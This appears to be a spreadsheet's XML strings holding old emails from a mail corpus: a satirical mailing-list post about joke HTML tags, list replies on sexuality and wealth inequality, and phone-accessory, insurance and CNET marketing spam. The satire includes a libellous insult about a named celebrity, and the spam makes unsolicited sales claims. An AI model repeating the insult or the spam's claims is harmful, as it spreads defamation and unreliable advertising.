 &lt;wot&gt;Charity agencies report that Iraqi leader Sadaam Hussein has
 adopted the African dictatorial habit of eating his political
 opponents.&lt;/wot&gt;
 Of particular interest to British code-monkeys is the new &lt;iht&gt; (I'm
 hurting too). This is designed for use when reporting on the life of
 Elizabeth the Queen Mother and other recently dead famous people:
 &lt;iht&gt;She touched our lives in so many ways with her common touch and her
 instinctive understanding of ordinary people. She will be sadly
 missed.&lt;/iht&gt;
 The instantaneous effect is to reduce the reader to teary-eyed and
 self-indulgent wallowing in which he or she becomes unaccountably upset
 about the death of a complete stranger.
 Political reporting also looks to benefit from the new &lt;spin&gt; tag. Any
 government ministerial pronouncement is thus rendered immediately
 transparent:
 &lt;spin&gt;Tony Blair was quick to defend transport secretary Byers, calling
 him "the most honest man it has been my privilege to know".&lt;/spin&gt;
 And, in a much-needed boost to satire sites, W3C has formally ratified
 the controversial &lt;nolibel&gt;. This guarantees any text contained within
 it complete immunity from prosecution:
 &lt;nolibel&gt;Naomi Campbell, we can confirm, is a talentless, drug-addicted
 perjurer who believes that good looks alone can justify her appalling
 and obnoxious behaviour.&lt;/nolibel&gt;
 The new tags have been warmly received by the programming community. W3C
 has, however, warned that they are to be used economically. It has
 further cautioned that they should never be used together, since the
 effect on the reader could be catastrophic:
 &lt;wot&gt;&lt;iht&gt;&lt;spin&gt;In response to reports that the Queen Mother had fallen
 victim to Sadaam Hussein's Axis of EvilT chemical weapons programme,
 Stephen Byers noted: "She was everybody's favourite grandmother who
 touched the lives of billions. The only consolation we can gain from
 this tragedy is that all of the UK's trains will be running on time by
 next Monday. And you can quote me on that."&lt;/spin&gt;&lt;/iht&gt;&lt;/wot&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Fwd: Explorator 5.15
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; So Eugen, how many of your homo friends have -had- 3k lovers?
 &gt; 
 &gt; In fact, thats a general question for FoRK proper.
 Uh, zero.  I'm sort of offended at having to take this question seriously,
 like being black and having to actually explain that black people don't
 all sing and dance.  I'd guess that gay men compared to straight men have
 a linearly greater number of sexual partners on the order of 1.5-2X.  But
 then again, it not a monolithic or homogeneous community.  Who knows?
 3K is utter shite.
 - Lucas
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Spectrum Invites You With Open Arms                         25336
</t>
  </si>
  <si>
    <t xml:space="preserve">Unbelievable Prices On Cell Phones And Accessories:
 http://www.chinaniconline.com/sales/
 Hands Free Ear Buds 1.99! 
 Phone Holsters 1.98! 
 Phone Cases 1.98! 
 Car Chargers 1.98! 
 Face Plates As Low As 2.98! 
 Lithium Ion Batteries As Low As 6.94! 
 http://www.chinaniconline.com/sales/
 Click Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, 
 SAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below 
 WHOLESALE PRICES!
 http://www.chinaniconline.com/sales/
 ***NEW*** Now Also: Accessories For PALM III, PALM VII, 
 PALM IIIc, PALM V, PALM M100 &amp; M105, HANDSPRING VISOR, COMPAQ iPAQ*** 
 Car Chargers 6.95! 
 Leather Cases 13.98! 
 USB Chargers 11.98! 
 Hot Sync Cables11.98! 
 http://www.chinaniconline.com/sales/
 ***If You Need Assistance Please Call Us  (732) 751-1457***
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 To be removed from future mailings please send your remove 
 request to: removemenow68994@btamail.net.cn 
 Thank You and have a super day :)
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 At 10:32 AM -0400 on 9/21/02, Gary Lawrence Murphy wrote:
 &gt; Cool --- I wasn't aware that the US had lifted it's population out
 &gt; of poverty! When did this happen? I wonder where the media gets the
 &gt; idea that the wealth gap is widening and deepening...
 All the world loves a smartass...
 :-).
 Seriously. Look at he life expectancy and human carrying capacity of
 this continent before the Europeans got here. Look at it now. Even
 for descendants of the original inhabitants. Even for the descendents
 of slaves, who were brought here by force.
 More stuff, cheaper. That's progress.
 Poverty, of course, is not relative. It's absolute. Disparity in
 wealth has nothing to do with it.
 It's like saying that groups have rights, when, in truth, only
 individuals do. Like group rights, "disparity" in wealth is
 statistical sophistry.
 Besides, even if you can't help the distribution, industrial wealth
 is almost always transitory, and so is relative poverty, even when
 there are no confiscatory death-taxes. The 20th anniversary Forbes
 400 just came out, and only a few tens of people are still there
 since 1982, a time which had significantly higher marginal taxes on
 wealth, income, and inheritance than we do now. More to the point,
 they're nowhere near the top.
 I'll take those odds. It is only when neofeudalism reasserts itself,
 in the form of government regulation, confiscatory taxes, legislated
 monopoly, corporate welfare, "non-profit" neoaristocratic tax dodges,
 and legalized labor extortion that we get slowdowns in progress, like
 what happened in Fabian-era Britain, or 1970's USA.
 In fact, it is in countries where wealth is the most "unfairly"
 distributed, that you get the most improvement in the general --
 economic -- welfare. More stuff cheaper, fewer people dying, more
 people living longer.
 I'll take those odds as well. People take greater risks when the
 returns are higher, improving the lot of us all as a result.
 Cheers,
 RAH
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPYy3ysPxH8jf3ohaEQLqNQCg14YvF8NVYwKiRrghHdisBoNCOn8AoPcR
 QUzorXeaLe5h3T1syKl7DFNT
 =9kff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</si>
  <si>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This is a multi-part message in MIME format.
 ------=_NextPart_000_C7177_01C24F78.AFE25230
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  The TBA Doctor Walks the Walk... On Diabetes!
  =20
  =20
 Case 1:	 Case 2:	=20
 ? Male age 37
 ? Nonsmoker=20
 ? $500,000 Face
 ? Type 1 Diabetic - Treated with Insulin Pump
 ? Diagnosed at age 23
 ? Hospitalized in '95, '96 and '98 with
   "Diabetic Complications"
 ? Issued Standard 	? Male age 51
 ? Nonsmoker=20
 ? $1,200,000 Face
 ? 6'0", 237lbs=20
 ? Takes Micronase and Glucophage
 ? Issued Super Standard =09
 Case 3:	 Case 4:	=20
 ? Female age 60
 ? Nonsmoker=20
 ? $2,000,000 Face
 ? 5'5", 165lbs=20
 ? Insulin Dependent=20
 ? Issued Super Standard 	? Male age 45
 ? Nonsmoker=20
 ? $875,000 Face
 ? 6'4", 275lbs
 ? Diabetes Controlled by Diet
 ? Issued Super Standard =09
 Click here to provide the details on your "tough case"
 &lt;http://nettrac.ipipeline.com/askdoctor/doctor.asp?gaid=3D0162&gt; 	=20
 Call the Doctor with your case details!
 We've cured 1,000s of agents' "tough cases!"
  800-624-4502 ext. 18=09
 =97 or =97
 Please fill out the form below for more information	=20
 Name:	 	  =09
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	=20
  	    =09
 =20
 Tennessee Brokerage Agency - www.TBA.com &lt;http://www.tba.com&gt; =20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.InsuranceIQ.com/optout
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_C7177_01C24F78.AFE25230
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;The TBA Doctor Walks the Walk on Diabetes&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#003333" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;&lt;img src=3D"http://iiq.us/images/tba/0729/20020729-101.gif" =
 alt=3D"The TBA Doctor Walks the Walk... On Diabetes!" width=3D"550" =
 height=3D"41"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/tba/0729/20020729-102.gif" =
 width=3D"278" height=3D"255"&gt;&lt;img =
 src=3D"http://iiq.us/images/tba/0729/20020729-103.gif" width=3D"272" =
 height=3D"255"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/tba/0729/20020729-104.gif" =
 width=3D"278" height=3D"190"&gt;&lt;img =
 src=3D"http://iiq.us/images/tba/0729/20020729-105.gif" width=3D"272" =
 height=3D"190"&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
             &lt;br&gt;=20
             &lt;table width=3D"100%" border=3D"1" cellpadding=3D"4" =
 cellspacing=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr bgcolor=3D"#000066"&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" =
 size=3D"2"&gt;Case 1:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" =
 size=3D"2"&gt;Case 2:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgcolor=3D"#FFFFCC"&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;Male age =
 37&lt;br&gt;
                   &amp;#149;&amp;nbsp;Nonsmoker &lt;br&gt;
                   &amp;#149;&amp;nbsp;$500,000 Face&lt;br&gt;
                   &amp;#149;&amp;nbsp;Type 1 Diabetic - Treated with Insulin =
 Pump&lt;br&gt;
                   &amp;#149;&amp;nbsp;Diagnosed at age 23&lt;br&gt;
                   &amp;#149;&amp;nbsp;Hospitalized in '95, '96 and '98 with&lt;br&gt;
                   &amp;nbsp;&amp;nbsp;&amp;quot;Diabetic Complications&amp;quot;&lt;br&gt;
                   &amp;#149;&amp;nbsp;&lt;b&gt;&lt;font color=3D"#FF0000"&gt;Issued =
 Standard&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"50%" valign=3D"top"&gt;&lt;font =
 size=3D"2"&gt;&amp;#149;&amp;nbsp;Male age 51&lt;br&gt;
                   &amp;#149;&amp;nbsp;Nonsmoker &lt;br&gt;
                   &amp;#149;&amp;nbsp;$1,200,000 Face&lt;br&gt;
                   &amp;#149;&amp;nbsp;6'0&amp;quot;, 237lbs &lt;br&gt;
                   &amp;#149;&amp;nbsp;Takes Micronase and Glucophage&lt;br&gt;
                   &amp;#149;&amp;nbsp;&lt;b&gt;&lt;font color=3D"#FF0000"&gt;Issued Super =
 Standard&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgcolor=3D"#000066"&gt;=20
                 &lt;td&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Case =
 3:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Case =
 4:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgcolor=3D"#FFFFCC"&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;Female =
 age 60&lt;br&gt;
                   &amp;#149;&amp;nbsp;Nonsmoker &lt;br&gt;
                   &amp;#149;&amp;nbsp;$2,000,000 Face&lt;br&gt;
                   &amp;#149;&amp;nbsp;5'5&amp;quot;, 165lbs &lt;br&gt;
                   &amp;#149;&amp;nbsp;Insulin Dependent &lt;br&gt;
                   &amp;#149;&amp;nbsp;&lt;b&gt;&lt;font color=3D"#FF0000"&gt;Issued Super =
 Standard&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2"&gt;&amp;#149;&amp;nbsp;Male age =
 45&lt;br&gt;
                   &amp;#149;&amp;nbsp;Nonsmoker &lt;br&gt;
                   &amp;#149;&amp;nbsp;$875,000 Face&lt;br&gt;
                   &amp;#149;&amp;nbsp;6'4&amp;quot;, 275lbs&lt;br&gt;
                   &amp;#149;&amp;nbsp;Diabetes Controlled by Diet&lt;br&gt;
                   &amp;#149;&amp;nbsp;&lt;b&gt;&lt;font color=3D"#FF0000"&gt;Issued Super =
 Standard&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;a =
 href=3D"http://nettrac.ipipeline.com/askdoctor/doctor.asp?gaid=3D0162"&gt;&lt;i=
 mg src=3D"http://iiq.us/images/tba/0729/20020729-2.gif" alt=3D"Click =
 here to provide the details on your &amp;quot;tough case&amp;quot;" =
 width=3D"484" height=3D"106" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20
             &lt;b&gt;&lt;font color=3D"#0000CC" size=3D"4"&gt;Call the Doctor with =
 your case details!&lt;br&gt;
             &lt;font color=3D"#FF0000"&gt;We've cured 1,000s of agents' =
 &amp;quot;tough cases!&amp;quot;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/tba/0729/20020729-3.gif" =
 alt=3D"800-624-4502 ext. 18" width=3D"540" height=3D"101"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"center"&gt;&lt;font size=3D"2"&gt;&amp;#8212; or =
 &amp;#8212;&lt;/font&gt;&lt;br&gt;
 						&lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
 							&lt;tr&gt;=20
 								&lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
 									&lt;td&gt;=20
 										&lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;Please fill =
 out the form below for more information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt; &lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"impairedrisk@tba.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"TBA Diabetes Ad Inquiry"&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
 									&lt;/td&gt;
 								&lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					  &lt;br&gt;
             &lt;a href=3D"http://www.tba.com"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/tba/20020509-3.gif" alt=3D"Tennessee =
 Brokerage Agency - www.TBA.com" width=3D"368" height=3D"106" =
 border=3D"0"&gt;&lt;/a&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt; &lt;p&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;=20
         We don't want anyone to receive our mailings who does not wish =
 to. This=20
         is professional communication sent to insurance professionals. =
 To be removed=20
         from this mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. =
 Instead,=20
         go here: &lt;a =
 href=3D"http://www.InsuranceIQ.com/optout"&gt;http://www.InsuranceIQ.com/opt=
 out&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_C7177_01C24F78.AFE25230--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Newsletter: PDA Edition&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;div align="center"&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_pda.gif" width="442" height="60" border="0" alt="CNET Shopper PDA Edition"&gt;&lt;br&gt;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&lt;div align="center"&gt; &lt;img 
 src="http://www.techrepublic.com/images/ads/advert_black.gif"
 width="120" height="10" border="0"&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTQ5FYvNV2H3f2jvrqULcR" target="top"&gt;
 &lt;img src="http://ad.doubleclick.net/ad/N2949.CNET/B962174.6;sz=160x600;ord=[timestamp]?"
 width="160" height="600" border="0"&gt;&lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=ae-jOE6QMB1PY9S1a38-mhe2RYEVuRR" &gt;Cyber Shot DSC-F707&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLxcW00LEWZ5znP-FdWuuFR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWMgqwIgnmkSWreAgRDc9R" &gt;Palm m515&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVqRJ0yU0Pxv3orMjEsaQuR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8cJBw_mS_XGuwrfzJ6nsR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=17-agitI5XroKRJaD9Iz4s1RhjGRsZR" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKHcrGkuZgVdngyV7VDjSuR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;BR&gt;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&lt;img src="http://www.cnet.com/i/sh/nl/handhelds_03.gif"&gt;&lt;/td&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 &lt;!--Prime Feature--&gt;			&lt;table&gt;
 									&lt;TR&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;TR&gt;
 										&lt;TD&gt;
 											&lt;a href="http://clickthru.online.com/Click?q=42-rF7cIPKS0-1or3Spz3F7_4EMIryR" &gt;&lt;IMG SRC="http://www.cnet.com/i/co/ps/200/20082924_200_1.gif" BORDER=0&gt;&lt;/A&gt;
 										&lt;/TD&gt;
 										&lt;TD valign=center&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 											&lt;a href="http://clickthru.online.com/Click?q=57-YJIXII04A-wyit-F0F_wt9Q9dZPR" &gt;&lt;B&gt;Sony CLIE PEG-T665C&lt;/B&gt;&lt;/a&gt;&lt;BR&gt;
 											&amp;#149; 66MHz processor&lt;BR&gt;
 											&amp;#149; Transflective LCD&lt;BR&gt;
 											&amp;#149; 16MB of RAM&lt;BR&gt;
 											&amp;#149; MP3 playback&lt;BR&gt;
 											&amp;#149; Strong infrared port&lt;BR&gt;
 											&amp;#149; &lt;B&gt;Just &lt;font color="#CC0000"&gt;$354&lt;/font&gt;&lt;/B&gt;
 &lt;br&gt;&lt;img src="/b.gif" width="1" height="10" border="0" alt=""&gt;&lt;br&gt;	
 &lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjQQA2jtbKQCL5-NPyEdnR" &gt;&lt;img src="http://shopper.cnet.com/i/sh/leaf/checkprices.gif" border=0"&gt;&lt;/a&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 								&lt;/table&gt;
 								&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 											&lt;B&gt;Accessorize this PDA:&lt;/b&gt;
 										&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KB8dLtho7pqfRO9R6BpKcR" &gt;Sony Mini Keyboard &lt;/a&gt;
 										&lt;/td&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduIRGdDmZjZWSoS2P4JmRR" &gt;Sony AC Adapter&lt;/a&gt;
 										&lt;/td&gt;
 									&lt;/tr&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdiyTKftcXydit0M-0OvFR" &gt;Sony Memory Stick Module&lt;/a&gt; 
 										&lt;/td&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dMyccJV41H99K8FZuS9R" &gt;Sony Carrying Case&lt;/a&gt; 
 										&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td colspan=2&gt;&lt;font face="arial, helvetica" size="-1"&gt;Looking to upgrade your PDA's memory? No matter what type of handheld you use, CNET's Memory Confiturator makes finding the perfect memory upgrade easier than ever. You're just a few clicks away from maximizing your PDA's potential!&lt;P&gt;
 										Check out CNET's new &lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPdLaJw4HunOIRzw0LGkkRR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt;
 &lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;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1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDFMUEy_Pudo6MzbuNK5xFR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8887507_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QkZj6-LBibgi4cHr7W6T9R" &gt;&lt;B&gt;Palm m130&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping available &lt;BR&gt;
 								&amp;#149; 8MB, Palm OS v4.1&lt;BR&gt;
 								&amp;#149; 65,000-color screen&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$210&lt;/font&gt; &lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGck2jxRJwCAV-hDEc2lRbuR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8928341_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPMzg9gWjabman8WccrYsR" &gt;&lt;B&gt;Palm m515&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Fusion of style and power&lt;BR&gt;
 								&amp;#149; 16MB, Palm OS v4.1&lt;BR&gt;
 								&amp;#149; MultiMediaCard slot&lt;BR&gt;
